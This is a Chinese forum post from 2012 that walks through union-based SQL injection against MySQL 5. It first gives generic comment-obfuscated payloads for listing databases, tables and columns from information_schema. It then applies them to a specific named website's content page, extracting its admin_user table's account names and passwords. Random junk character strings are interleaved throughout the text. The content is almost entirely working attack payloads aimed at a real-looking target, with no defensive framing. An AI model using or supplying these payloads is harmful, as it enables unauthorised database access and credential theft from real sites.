查库( V. X* t% H% X1 z; e! L
) D! g( \6 M- `* m5 W7 y0 G2 w t+ cid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*, e: z9 ]4 r$ l
. {3 k' G: B% H0 Y查表' ?! S( Z1 I- e. E- n/ ~/ ?3 e
3 x+ T+ w; H4 M$ [- M7 F* ~id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,12 O7 G8 L' J9 W. e$ h( J' J
7 n% b- {: r. Z( j+ [/ w2 F
查段
; F( m+ m: [- H0 H3 T& ]) W0 P
6 Y; a% A! H) v: sid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1- C! Y4 j) N- z& Q- X* E9 H1 l8 t0 x
: N( t0 M7 a3 @; p( F" z5 G9 x9 H7 J" p/ l
mysql5高级注入方法暴表) ]9 v7 M2 m/ V0 q+ s9 Q! x
9 Q: B, o; v! z( X* X& a例子如下:+ t( J+ x' z: g7 Z0 p- U
" t! O, }9 q7 S4 f: ^; F& d1.爆表8 f7 h, c8 e/ Y3 b6 t8 m
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
0 q; l2 N! e8 r, G+ G: c0 s这样爆到第4个时出现了admin_user表。
( `% F" k0 {' A$ B
. e6 g5 I/ W5 \/ L- h2.暴字段8 r. }# Y a, m- [* L
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*: R7 n5 |# b$ E7 G5 y
* Y5 N: D! E% B% O! B# V% J" T: m E
3.爆密码
. t( e( r# S5 ~- [http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ( _0 h! D; p, [
+ g0 i# A+ N8 r. L% t
6 A& |4 Y- |4 @3 g6 p( }
|
发表于 2012-9-13 16:29:37
收藏
支持
反对